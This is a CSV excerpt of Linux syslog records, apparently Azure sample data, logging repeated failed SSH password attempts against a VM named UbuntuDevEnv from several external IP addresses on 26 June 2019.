+17326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:56,UbuntuDevEnv,2019-06-26 09:00:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:56,UbuntuDevEnv,2019-06-26 09:00:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,64469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:58,UbuntuDevEnv,2019-06-26 09:00:57,auth,UbuntuDevEnv,info,Failed password for invalid user user from 183.47.14.74 port 37664 ssh2,64469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,183.47.14.7,37664,,
+17329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:59,UbuntuDevEnv,2019-06-26 09:00:58,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 37664:11: Bye Bye [preauth],64469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,37664,,
+17330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:00:59,UbuntuDevEnv,2019-06-26 09:00:58,auth,UbuntuDevEnv,info,Disconnected from invalid user user 183.47.14.74 port 37664 [preauth],64469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,183.47.14.7,37664,,
+17331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:01:05,UbuntuDevEnv,2019-06-26 09:01:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78  user=test,64511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,185.103.243.7,,0,
+17332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:01:06,UbuntuDevEnv,2019-06-26 09:01:06,auth,UbuntuDevEnv,info,Failed password for test from 185.103.243.78 port 58948 ssh2,64511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,58948,,
+17333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:01:06,UbuntuDevEnv,2019-06-26 09:01:06,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 58948:11: Bye Bye [preauth],64511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,58948,,
+17334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:01:06,UbuntuDevEnv,2019-06-26 09:01:06,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 185.103.243.78 port 58948 [preauth],64511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,185.103.243.7,58948,,
+17335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:02,UbuntuDevEnv,2019-06-26 09:02:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:02,UbuntuDevEnv,2019-06-26 09:02:01,auth,UbuntuDevEnv,info,Invalid user diella from 143.0.52.117 port 58983,64706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diella,143.0.52.1,58983,,
+17337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:02,UbuntuDevEnv,2019-06-26 09:02:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,64706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:04,UbuntuDevEnv,2019-06-26 09:02:03,auth,UbuntuDevEnv,info,Failed password for invalid user diella from 143.0.52.117 port 58983 ssh2,64706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diella,143.0.52.1,58983,,
+17339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:04,UbuntuDevEnv,2019-06-26 09:02:04,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 58983:11: Bye Bye [preauth],64706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,58983,,
+17340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:04,UbuntuDevEnv,2019-06-26 09:02:04,auth,UbuntuDevEnv,info,Disconnected from invalid user diella 143.0.52.117 port 58983 [preauth],64706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diella,143.0.52.1,58983,,
+17341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:29,UbuntuDevEnv,2019-06-26 09:02:28,auth,UbuntuDevEnv,info,Invalid user deploy from 187.6.249.142 port 44772,64811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,187.6.249.1,44772,,
+17342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:29,UbuntuDevEnv,2019-06-26 09:02:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,64811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:29,UbuntuDevEnv,2019-06-26 09:02:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:31,UbuntuDevEnv,2019-06-26 09:02:30,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 187.6.249.142 port 44772 ssh2,64811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,187.6.249.1,44772,,
+17345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:31,UbuntuDevEnv,2019-06-26 09:02:30,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 44772:11: Bye Bye [preauth],64811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,44772,,
+17346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:31,UbuntuDevEnv,2019-06-26 09:02:30,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 187.6.249.142 port 44772 [preauth],64811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,187.6.249.1,44772,,
+17347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:45,UbuntuDevEnv,2019-06-26 09:02:45,auth,UbuntuDevEnv,info,Invalid user I2b2demodata2 from 185.103.243.78 port 46314,64870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,I2b2demodata2,185.103.243.7,46314,,
+17348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:45,UbuntuDevEnv,2019-06-26 09:02:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:45,UbuntuDevEnv,2019-06-26 09:02:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,64870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:47,UbuntuDevEnv,2019-06-26 09:02:47,auth,UbuntuDevEnv,info,Failed password for invalid user I2b2demodata2 from 185.103.243.78 port 46314 ssh2,64870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,I2b2demodata2,185.103.243.7,46314,,
+17351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:47,UbuntuDevEnv,2019-06-26 09:02:47,auth,UbuntuDevEnv,info,Disconnected from invalid user I2b2demodata2 185.103.243.78 port 46314 [preauth],64870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,I2b2demodata2,185.103.243.7,46314,,
+17352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:47,UbuntuDevEnv,2019-06-26 09:02:47,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 46314:11: Bye Bye [preauth],64870,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,46314,,
+17353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:02:50,UbuntuDevEnv,2019-06-26 09:02:50,auth,UbuntuDevEnv,info,Connection closed by 183.47.14.74 port 45611 [preauth],64876,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,45611,,
+17354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:03:59,UbuntuDevEnv,2019-06-26 09:03:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117  user=bin,65129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bin,143.0.52.1,,0,
+17355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:01,UbuntuDevEnv,2019-06-26 09:04:00,auth,UbuntuDevEnv,info,Failed password for bin from 143.0.52.117 port 39291 ssh2,65129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,39291,,
+17356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:01,UbuntuDevEnv,2019-06-26 09:04:00,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 39291:11: Bye Bye [preauth],65129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,39291,,
+17357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:01,UbuntuDevEnv,2019-06-26 09:04:00,auth,UbuntuDevEnv,info,Disconnected from authenticating user bin 143.0.52.117 port 39291 [preauth],65129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,bin,143.0.52.1,39291,,
+17358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:29,UbuntuDevEnv,2019-06-26 09:04:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78  user=mysql,65235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql,185.103.243.7,,0,
+17359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:31,UbuntuDevEnv,2019-06-26 09:04:31,auth,UbuntuDevEnv,info,Failed password for mysql from 185.103.243.78 port 33682 ssh2,65235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,33682,,
+17360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:31,UbuntuDevEnv,2019-06-26 09:04:31,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 33682:11: Bye Bye [preauth],65235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,33682,,
+17361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:31,UbuntuDevEnv,2019-06-26 09:04:31,auth,UbuntuDevEnv,info,Disconnected from authenticating user mysql 185.103.243.78 port 33682 [preauth],65235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mysql,185.103.243.7,33682,,
+17362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:47,UbuntuDevEnv,2019-06-26 09:04:47,auth,UbuntuDevEnv,info,Invalid user filter from 183.47.14.74 port 53560,65283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filter,183.47.14.7,53560,,
+17363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:47,UbuntuDevEnv,2019-06-26 09:04:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:47,UbuntuDevEnv,2019-06-26 09:04:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,65283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:49,UbuntuDevEnv,2019-06-26 09:04:49,auth,UbuntuDevEnv,info,Failed password for invalid user filter from 183.47.14.74 port 53560 ssh2,65283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filter,183.47.14.7,53560,,
+17366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:50,UbuntuDevEnv,2019-06-26 09:04:50,auth,UbuntuDevEnv,info,Disconnected from invalid user filter 183.47.14.74 port 53560 [preauth],65283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filter,183.47.14.7,53560,,
+17367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:50,UbuntuDevEnv,2019-06-26 09:04:50,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 53560:11: Bye Bye [preauth],65283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,53560,,
+17368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:58,UbuntuDevEnv,2019-06-26 09:04:57,auth,UbuntuDevEnv,info,Invalid user calude from 176.31.43.255 port 40562,65344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calude,176.31.43.2,40562,,
+17369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:58,UbuntuDevEnv,2019-06-26 09:04:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:04:58,UbuntuDevEnv,2019-06-26 09:04:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,65344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:00,UbuntuDevEnv,2019-06-26 09:04:59,auth,UbuntuDevEnv,info,Failed password for invalid user calude from 176.31.43.255 port 40562 ssh2,65344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calude,176.31.43.2,40562,,
+17372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:00,UbuntuDevEnv,2019-06-26 09:04:59,auth,UbuntuDevEnv,info,Disconnected from invalid user calude 176.31.43.255 port 40562 [preauth],65344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calude,176.31.43.2,40562,,
+17373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:00,UbuntuDevEnv,2019-06-26 09:04:59,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 40562:11: Bye Bye [preauth],65344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,40562,,
+17374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:07,UbuntuDevEnv,2019-06-26 09:05:07,auth,UbuntuDevEnv,info,Invalid user xiu from 176.31.202.90 port 36650,65384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,176.31.202.9,36650,,
+17375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:07,UbuntuDevEnv,2019-06-26 09:05:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:07,UbuntuDevEnv,2019-06-26 09:05:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,65384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:09,UbuntuDevEnv,2019-06-26 09:05:08,auth,UbuntuDevEnv,info,Failed password for invalid user xiu from 176.31.202.90 port 36650 ssh2,65384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,176.31.202.9,36650,,
+17378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:09,UbuntuDevEnv,2019-06-26 09:05:08,auth,UbuntuDevEnv,info,Disconnected from invalid user xiu 176.31.202.90 port 36650 [preauth],65384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,176.31.202.9,36650,,
+17379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:09,UbuntuDevEnv,2019-06-26 09:05:08,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 36650:11: Bye Bye [preauth],65384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,36650,,
+17380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:17,UbuntuDevEnv,2019-06-26 09:05:16,auth,UbuntuDevEnv,info,Invalid user Waschlappen from 165.22.203.187 port 36046,65421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Waschlappen,165.22.203.1,36046,,
+17381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:17,UbuntuDevEnv,2019-06-26 09:05:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:17,UbuntuDevEnv,2019-06-26 09:05:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,65421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:19,UbuntuDevEnv,2019-06-26 09:05:18,auth,UbuntuDevEnv,info,Failed password for invalid user Waschlappen from 165.22.203.187 port 36046 ssh2,65421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Waschlappen,165.22.203.1,36046,,
+17384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:19,UbuntuDevEnv,2019-06-26 09:05:18,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 36046:11: Bye Bye [preauth],65421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,36046,,
